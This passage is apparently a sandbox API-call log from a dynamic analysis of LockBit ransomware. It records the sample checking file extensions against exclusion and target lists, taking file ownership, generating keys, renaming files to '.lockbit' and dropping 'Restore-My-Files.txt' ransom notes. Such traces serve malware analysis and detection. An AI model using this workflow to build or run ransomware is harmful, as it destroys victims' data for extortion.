lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0080.309] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0080.309] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0080.309] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0080.309] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0080.309] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0080.309] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0080.309] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0080.310] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0080.310] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0080.310] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0080.310] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0080.310] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0080.310] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0080.310] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0080.310] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0080.310] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0080.310] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0080.310] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0080.310] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0080.310] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0080.310] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0080.310] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0080.310] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0080.310] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0080.310] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0080.310] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0080.310] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0080.310] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0080.310] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0080.310] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0080.310] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0080.310] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0080.310] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="1047x576black.png") returned 1 [0080.310] lstrcmpiW (lpString1="ntldr", lpString2="1047x576black.png") returned 1 [0080.311] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="1047x576black.png") returned 1 [0080.311] lstrcmpiW (lpString1="bootsect.bak", lpString2="1047x576black.png") returned 1 [0080.311] lstrcmpiW (lpString1="autorun.inf", lpString2="1047x576black.png") returned 1 [0080.311] lstrcmpiW (lpString1="thumbs.db", lpString2="1047x576black.png") returned 1 [0080.311] lstrcmpiW (lpString1="iconcache.db", lpString2="1047x576black.png") returned 1 [0080.311] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\") returned="" [0080.311] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\1047x576black.png") returned=".png" [0080.311] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0080.311] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0080.311] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0080.311] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0080.311] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0080.311] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0080.311] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0080.311] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0080.311] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0080.311] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0080.311] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0080.311] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0080.311] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0080.311] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0080.311] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0080.311] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0080.311] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0080.311] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0080.311] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0080.312] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0080.312] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0080.312] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0080.312] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0080.312] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0080.312] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0080.312] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0080.312] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0080.312] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0080.312] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\1047x576black.png.lockbit") returned 79 [0080.312] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\1047x576black.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0080.314] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0080.314] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0080.314] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0080.314] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0080.315] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0080.315] RtlFreeAnsiString (AnsiString="\\") [0080.315] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3a0) returned 0x0 [0080.315] malloc (_Size=0x200) returned 0x77d800 [0080.315] NtQueryInformationToken (in: TokenHandle=0x3a0, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0080.315] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0080.315] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0080.315] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\1047x576black.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0080.316] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\1047x576black.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0080.316] CloseHandle (hObject=0x3a0) returned 1 [0080.316] free (_Block=0x77d800) [0080.316] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\1047x576black.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3a0 [0080.316] CreateIoCompletionPort (FileHandle=0x3a0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0080.316] malloc (_Size=0x40068) returned 0x3d70048 [0080.316] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=4570) returned 1 [0080.316] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.317] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.317] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0080.317] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.318] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.318] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0080.318] ReadFile (in: hFile=0x3a0, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0080.324] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\1047x576black.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\1047x576black.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0080.324] malloc (_Size=0xb4) returned 0x1ff1e60 [0080.325] NtSetInformationFile (FileHandle=0x3a0, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xb4, FileInformationClass=0xa) returned 0x0 [0080.333] free (_Block=0x1ff1e60) [0080.333] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\1047x576black.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage") returned 1 [0080.333] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\Restore-My-Files.txt") returned 74 [0080.333] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3ac [0080.334] CreateIoCompletionPort (FileHandle=0x3ac, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0080.334] malloc (_Size=0x40068) returned 0x1fb18c0 [0080.334] WriteFile (in: hFile=0x3ac, lpBuffer=0x1fa30f8, nNumberOfBytesToWrite=0x472, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fa30f8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0080.336] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fe3ea46, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fe3ea46, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d019747, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb04, dwReserved0=0x0, dwReserved1=0x0, cFileName="203x8subpicture.png", cAlternateFileName="")) returned 1 [0080.336] lstrcmpiW (lpString1=".", lpString2="203x8subpicture.png") returned -1 [0080.336] lstrcmpiW (lpString1="..", lpString2="203x8subpicture.png") returned -1 [0080.336] PathFindExtensionW (pszPath="203x8subpicture.png") returned=".png" [0080.336] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0080.336] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0080.336] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0080.336] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0080.336] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0080.336] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0080.336] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0080.336] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0080.336] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0080.336] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0080.336] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0080.336] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0080.336] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0080.336] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0080.336] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0080.337] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0080.337] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0080.337] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0080.337] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0080.337] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0080.337] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0080.337] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0080.337] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0080.337] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0080.337] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0080.337] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0080.337] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0080.337] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0080.337] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0080.337] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0080.337] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0080.337] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0080.337] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0080.337] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0080.337] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0080.337] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0080.337] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0080.337] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0080.338] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0080.338] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0080.338] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0080.338] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0080.338] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0080.338] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0080.338] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0080.338] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0080.338] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0080.338] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="203x8subpicture.png") returned 1 [0080.338] lstrcmpiW (lpString1="ntldr", lpString2="203x8subpicture.png") returned 1 [0080.338] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="203x8subpicture.png") returned 1 [0080.338] lstrcmpiW (lpString1="bootsect.bak", lpString2="203x8subpicture.png") returned 1 [0080.338] lstrcmpiW (lpString1="autorun.inf", lpString2="203x8subpicture.png") returned 1 [0080.338] lstrcmpiW (lpString1="thumbs.db", lpString2="203x8subpicture.png") returned 1 [0080.338] lstrcmpiW (lpString1="iconcache.db", lpString2="203x8subpicture.png") returned 1 [0080.338] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\") returned="" [0080.338] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\203x8subpicture.png") returned=".png" [0080.338] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0080.338] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0080.338] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0080.338] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0080.338] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0080.339] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0080.339] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0080.339] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0080.339] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0080.339] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0080.339] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0080.339] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0080.339] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0080.339] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0080.339] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0080.339] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0080.339] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0080.339] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0080.339] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0080.339] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0080.339] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0080.339] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0080.339] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0080.339] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0080.339] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0080.339] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0080.339] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0080.339] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0080.340] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\203x8subpicture.png.lockbit") returned 81 [0080.340] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\203x8subpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\203x8subpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0080.343] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0080.343] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0080.343] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0080.343] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0080.344] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0080.344] RtlFreeAnsiString (AnsiString="\\") [0080.344] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3a0) returned 0x0 [0080.344] malloc (_Size=0x200) returned 0x77d800 [0080.344] NtQueryInformationToken (in: TokenHandle=0x3a0, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0080.344] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0080.344] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0080.344] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\203x8subpicture.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0080.344] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\203x8subpicture.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0080.345] CloseHandle (hObject=0x3a0) returned 1 [0080.345] free (_Block=0x77d800) [0080.345] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\203x8subpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\203x8subpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3a0 [0080.345] CreateIoCompletionPort (FileHandle=0x3a0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0080.345] malloc (_Size=0x40068) returned 0x1fb18c0 [0080.345] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=2820) returned 1 [0080.345] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.346] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.346] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0080.346] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.346] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.346] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0080.346] ReadFile (in: hFile=0x3a0, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0080.365] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\203x8subpicture.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\203x8subpicture.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0080.365] malloc (_Size=0xb8) returned 0x1ff1e60 [0080.365] NtSetInformationFile (FileHandle=0x3a0, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xb8, FileInformationClass=0xa) returned 0xc0000008 [0080.365] free (_Block=0x1ff1e60) [0080.365] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\203x8subpicture.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage") returned 1 [0080.365] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\Restore-My-Files.txt") returned 74 [0080.365] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0080.365] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fed6fba, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fed6fba, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d019747, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationLeft_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0080.365] lstrcmpiW (lpString1=".", lpString2="NavigationLeft_ButtonGraphic.png") returned -1 [0080.365] lstrcmpiW (lpString1="..", lpString2="NavigationLeft_ButtonGraphic.png") returned -1 [0080.365] PathFindExtensionW (pszPath="NavigationLeft_ButtonGraphic.png") returned=".png" [0080.365] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0080.365] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0080.365] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0080.365] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0080.365] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0080.365] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0080.365] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0080.366] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0080.366] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0080.366] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0080.366] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0080.366] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0080.366] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0080.366] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0080.366] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0080.366] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0080.366] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0080.366] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0080.366] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0080.366] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0080.366] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0080.366] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0080.366] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0080.366] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0080.366] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0080.366] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0080.366] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0080.366] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0080.366] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0080.366] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0080.366] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0080.366] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0080.366] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0080.367] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0080.367] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0080.367] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0080.367] 